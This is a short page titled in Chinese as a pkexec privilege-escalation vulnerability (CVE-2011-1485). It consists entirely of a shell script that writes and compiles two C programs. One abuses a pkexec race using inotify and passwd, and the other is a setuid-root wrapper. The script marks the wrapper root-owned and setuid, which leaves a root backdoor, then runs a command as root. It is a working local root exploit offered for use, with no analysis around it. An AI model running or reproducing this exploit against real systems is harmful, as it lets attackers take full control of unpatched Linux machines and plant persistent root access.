# CVE-2011-1485 pkexec特權提升漏洞
==run.sh==
# modified from http://downloads.securityfocus.com/vulnerabilities/exploits/47496.sh # for rdot.org cat > suid.c << _EOF #include#include main(int argc, char *argv[]) { if(argc == 2) { setgid(0); setuid(0); system(argv[1]); } return 0; } _EOF cat > makesuid.c << _EOF #include #include #include #include #include int main(int argc, char **argv) { if (fork() != 0) { int fd; char pid_path[15]; sprintf(pid_path, "/proc/%i", getpid()); close(0); close(1); close(2); fd = inotify_init(); inotify_add_watch(fd, pid_path, IN_ACCESS); read(fd, NULL, 0); execl("/usr/bin/passwd", "/usr/bin/passwd", NULL); } else { execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL); } return 0; } _EOF gcc -o suid suid.c gcc -o makesuid makesuid.c ./makesuid chown root:root $PWD/suid ./makesuid chmod u+s $PWD/suid echo "your suid is on ./suid make sure u move this !!!" rm suid.c makesuid.c makesuid $PWD/suid -c /usr/bin/id